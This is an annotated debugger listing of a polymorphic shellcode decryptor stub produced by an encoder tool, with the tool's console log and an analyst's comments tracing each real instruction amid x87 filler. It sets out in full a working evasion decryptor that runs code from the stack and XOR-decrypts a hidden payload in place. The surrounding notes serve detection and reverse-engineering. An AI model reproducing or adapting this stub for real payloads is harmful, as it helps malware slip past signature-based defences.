; ---------------------------------------------------------------------------
; Encoder console output followed by a debugger listing of the generated
; decryptor stub (process "testsh"). The listing runs 00401054..004011CE,
; which is 0x17B = 379 bytes and matches "Decryptor body size" below.
; Reading guide: only a few integer instructions do real work (marked
; "REAL"). The x87 instructions, flag toggles (STC/CMC/STD/CLD), compares
; against random immediates and reg,reg no-ops are filler: no FNSTSW/FCOMI
; appears, so FPU results never reach EFLAGS or the integer registers.
; The short conditional jumps skip only filler, so both paths converge with
; the same register state.
; Analyst takeaways: working constants are built indirectly (BSWAP plus
; cancelling ADD/SUB pairs), so literal-byte signatures are presumably
; unstable across generations. The stable traits visible here are behavioural:
; code executed from the stack, and in-place XOR writes to the bytes that
; directly follow the running code (a writable + executable region).
; ---------------------------------------------------------------------------
[+] The decryptor body was generated!
[+] Decryptor body size = 379 bytes
[+] Shellcode size = 349 bytes
[+] Decryptor + Shellcode size = 728 bytes
[+] Magic byte is C0
[+] Crypto steping = 3 byte(s)
[+] Pass steping = 1 byte(s)
[+] Shellcode dumped to D:\asm\shell.txt.tapion_bin
; 733 written vs 728 computed above; the listing does not show the 5 extra
; bytes. The first XOR below reaches 3 bytes past the 349-byte payload, so
; part of it is presumably padding (confirm against the dumped file).
[+] Written 733 bytes
[+] Shellcode header stored to D:\asm\shell.txt.tapion_bin.h

; --- Stage 1: build the byte counter in EBX (ends as 0x15D = 349) ----------
00401054 C7C3 B043F745 MOV EBX,45F743B0 ; REAL: seed, cancelled below
0040105A 9B WAIT
0040105B DBE3 FINIT ; resets the FPU before the x87 filler starts
0040105D D9F0 F2XM1
0040105F FD STD ; filler: no string instruction appears in this listing
00401060 D9E5 FXAM
00401062 0FCB BSWAP EBX ; REAL: EBX = B043F745
00401064 8BDB MOV EBX,EBX
00401066 D9F1 FYL2X
00401068 21C9 AND ECX,ECX
0040106A 81EB 45F743B0 SUB EBX,B043F745 ; REAL: EBX = 0
00401070 81FF DAA12C42 CMP EDI,422CA1DA
00401076 FD STD
00401077 81F9 61CB8E16 CMP ECX,168ECB61
0040107D 81F8 18D6D62E CMP EAX,2ED6D618
00401083 C7C3 4E739F38 MOV EBX,389F734E ; REAL: second seed
00401089 21FF AND EDI,EDI
0040108B 81EB 51739F38 SUB EBX,389F7351 ; REAL: EBX = -3
00401091 8BC9 MOV ECX,ECX
00401093 D9FF FCOS
00401095 3BFA CMP EDI,EDX
00401097 DBE2 FCLEX
00401099 43 INC EBX ; REAL: EBX = -2
0040109A DBE2 FCLEX
0040109C F5 CMC
0040109D D9FC FRNDINT
0040109F F9 STC
004010A0 D9F0 F2XM1
004010A2 43 INC EBX ; REAL: EBX = -1
004010A3 43 INC EBX ; REAL: EBX = 0
004010A4 09D2 OR EDX,EDX
004010A6 66:C7C3 5E01 MOV BX,15E ; REAL: EBX = 0x15E (upper half is already zero)
004010AB D9FE FSIN
004010AD DEC9 FMULP ST(1),ST
004010AF DBE2 FCLEX
004010B1 4B DEC EBX ; REAL: EBX = 0x15D = 349, the "Shellcode size" from the log
004010B2 EB 08 JMP SHORT testsh.004010BC ; skips five filler instructions
004010B4 F9 STC
004010B5 DBE2 FCLEX
004010B7 DDC1 FFREE ST(1)
004010B9 90 NOP
004010BA D9F9 FYL2XP1

; --- Stage 2: locate own address via a 4-byte stub run from the stack ------
004010BC D9F5 FPREM1
004010BE 09FF OR EDI,EDI
; The immediate bytes 90 5F FF E7 are themselves code: NOP / POP EDI / JMP EDI.
004010C0 C7C7 905FFFE7 MOV EDI,E7FF5F90 ; REAL: stub bytes as a dword
004010C6 D9FC FRNDINT
004010C8 85FF TEST EDI,EDI
004010CA 85C9 TEST ECX,ECX
004010CC F9 STC
004010CD 57 PUSH EDI ; REAL: stub now lives at [ESP]
004010CE 77 03 JA SHORT testsh.004010D3 ; filler branch; CF was just set, so not taken
004010D0 FD STD
004010D1 F5 CMC
004010D2 F5 CMC
004010D3 81F8 A42DB618 CMP EAX,18B62DA4
004010D9 DEE1 FSUBRP ST(1),ST
004010DB 8D3C24 LEA EDI,DWORD PTR SS:[ESP] ; REAL: EDI = address of the stub
; Executes from the stack: the stub pops the return address (004010E0) into
; EDI and jumps back to it. With a non-executable stack this CALL would fault.
; The pushed dword is not popped afterwards in this listing.
004010DE FFD7 CALL EDI ; REAL: on return EDI = 004010E0

; --- Stage 3: EAX = key pointer, EDX = payload offset ----------------------
004010E0 C7C0 1C4D5387 MOV EAX,87534D1C ; REAL: seed, cancelled by the two ADDs
004010E6 21FF AND EDI,EDI
004010E8 D9E8 FLD1
004010EA 8BD2 MOV EDX,EDX
004010EC 81C0 08F2C724 ADD EAX,24C7F208 ; REAL: EAX = AC1B3F24
004010F2 DEC9 FMULP ST(1),ST
004010F4 3BFB CMP EDI,EBX
004010F6 8BFF MOV EDI,EDI
004010F8 D9F6 FDECSTP
004010FA DBE2 FCLEX
004010FC 81C0 DCC0E453 ADD EAX,53E4C0DC ; REAL: wraps to EAX = 0
00401102 DDD9 FSTP ST(1)
00401104 85DB TEST EBX,EBX
00401106 DEE1 FSUBRP ST(1),ST
00401108 DDE9 FUCOMP ST(1)
0040110A F9 STC
0040110B 03C7 ADD EAX,EDI ; REAL: EAX = 004010E0, i.e. the key is read from the stub's own bytes
0040110D DBE2 FCLEX
0040110F D9FC FRNDINT
00401111 21FF AND EDI,EDI
00401113 D9F7 FINCSTP
00401115 DEF9 FDIVP ST(1),ST
00401117 C7C2 3F6634E6 MOV EDX,E634663F ; REAL: seed
0040111D 0FCA BSWAP EDX ; REAL: EDX = 3F6634E6
0040111F 81EA 9832663F SUB EDX,3F663298 ; REAL: EDX = 0x24E (590)

; --- Stage 4: decrypt loop (JG at 004011C7 returns here) -------------------
00401125 FF30 PUSH DWORD PTR DS:[EAX] ; REAL: fetch the 4-byte key at the key pointer
00401127 77 0B JA SHORT testsh.00401134 ; filler branch
00401129 FD STD
0040112A D9E0 FCHS
0040112C 81FF 5FA53922 CMP EDI,2239A55F
00401132 D9F2 FPTAN
00401134 D9FF FCOS
00401136 D9E0 FCHS
00401138 59 POP ECX ; REAL: ECX = key dword
00401139 FD STD
0040113A 8038 C0 CMP BYTE PTR DS:[EAX],0C0 ; REAL: test for the "Magic byte" C0 from the log
0040113D D9F1 FYL2X
0040113F D9F9 FYL2XP1
00401141 DAE9 FUCOMPP
00401143 75 10 JNZ SHORT testsh.00401155 ; REAL: no magic byte -> keep the key pointer
; Magic byte seen: PUSH EDI / XCHG / POP EDI nets out to EAX = EDI, which
; rewinds the key pointer to 004010E0 and leaves EDI unchanged.
; NOTE(review): the byte at 004010E1 (second opcode byte of the MOV EAX at
; 004010E0) is itself C0, so the rewind appears to fire on the second pass
; already, which would keep the key stream very short. Confirm in a debugger.
00401145 D8D1 FCOM ST(1)
00401147 57 PUSH EDI ; REAL
00401148 DEE1 FSUBRP ST(1),ST
0040114A D9F3 FPATAN
0040114C DEF9 FDIVP ST(1),ST
0040114E 87C7 XCHG EDI,EAX ; REAL
00401150 5F POP EDI ; REAL
00401151 D8D1 FCOM ST(1)
00401153 D9E4 FTST
00401155 DEC9 FMULP ST(1),ST
00401157 D9E4 FTST
00401159 DDE1 FUCOM ST(1)
0040115B D9E5 FXAM
0040115D 81EA FCB20274 SUB EDX,7402B2FC ; filler: undone by the ADD at 00401169
00401163 F9 STC
00401164 F5 CMC
00401165 DEF1 FDIVRP ST(1),ST
00401167 DEC1 FADDP ST(1),ST
00401169 81C2 FCB20274 ADD EDX,7402B2FC
0040116F 09C9 OR ECX,ECX
00401171 81FF 9749B351 CMP EDI,51B34997
; Three DEC EDX = the "Crypto steping = 3 byte(s)" from the log.
00401177 4A DEC EDX ; REAL
00401178 09C9 OR ECX,ECX
0040117A DBE2 FCLEX
0040117C 4A DEC EDX ; REAL
0040117D F5 CMC
0040117E D9F9 FYL2XP1
00401180 FD STD
00401181 D9F6 FDECSTP
00401183 4A DEC EDX ; REAL: first pass gives EDX = 0x24B
00401184 DEF9 FDIVP ST(1),ST
00401186 21FF AND EDI,EDI
00401188 DEC9 FMULP ST(1),ST
; The in-place decryption write. The first target is 004010E0 + 0x24B =
; 0040132B, the last byte of the 349-byte payload that starts at 004011CF.
; Each pass XORs 4 bytes but moves down only 3, so neighbouring dwords
; overlap by one byte. The memory must be writable and executable.
0040118A F0:310C3A LOCK XOR DWORD PTR DS:[EDX+EDI],ECX ; LOCK prefix ; REAL: payload dword ^= key
0040118E 73 01 JNB SHORT testsh.00401191 ; filler branch; XOR clears CF, so always taken
00401190 FD STD
00401191 DBE2 FCLEX
00401193 DEF1 FDIVRP ST(1),ST
00401195 DAE9 FUCOMPP
00401197 09D2 OR EDX,EDX
00401199 21DB AND EBX,EBX
; Three DEC EBX: the byte counter drops by 3 per pass, in step with EDX.
0040119B 4B DEC EBX ; REAL
0040119C FC CLD
0040119D 4B DEC EBX ; REAL
0040119E 73 0A JNB SHORT testsh.004011AA ; filler branch; skips only no-ops
004011A0 D9FE FSIN
004011A2 21C0 AND EAX,EAX
004011A4 D9FE FSIN
004011A6 3BCB CMP ECX,EBX
004011A8 85FF TEST EDI,EDI
004011AA 4B DEC EBX ; REAL
004011AB F5 CMC
004011AC 81F9 EA9C405A CMP ECX,5A409CEA
004011B2 DEC9 FMULP ST(1),ST
004011B4 DDE9 FUCOMP ST(1)
004011B6 40 INC EAX ; REAL: key pointer +1, the "Pass steping = 1 byte(s)" from the log
004011B7 7E 06 JLE SHORT testsh.004011BF ; filler branch
004011B9 D9E0 FCHS
004011BB DED9 FCOMPP
004011BD 21C0 AND EAX,EAX
004011BF DEF1 FDIVRP ST(1),ST
004011C1 09D2 OR EDX,EDX
004011C3 85DB TEST EBX,EBX ; REAL: sets the flags for the JG; FSCALE leaves EFLAGS alone
004011C5 D9FD FSCALE
; 349 / 3 rounds up to 117 passes; the last one targets EDI + 0xEF = 004011CF,
; the first byte after this stub.
004011C7 ^0F8F 58FFFFFF JG testsh.00401125 ; REAL: repeat while EBX > 0 (signed)
004011CD D9FE FSIN ; last 2 bytes of the stub; execution then falls into the decrypted bytes at 004011CF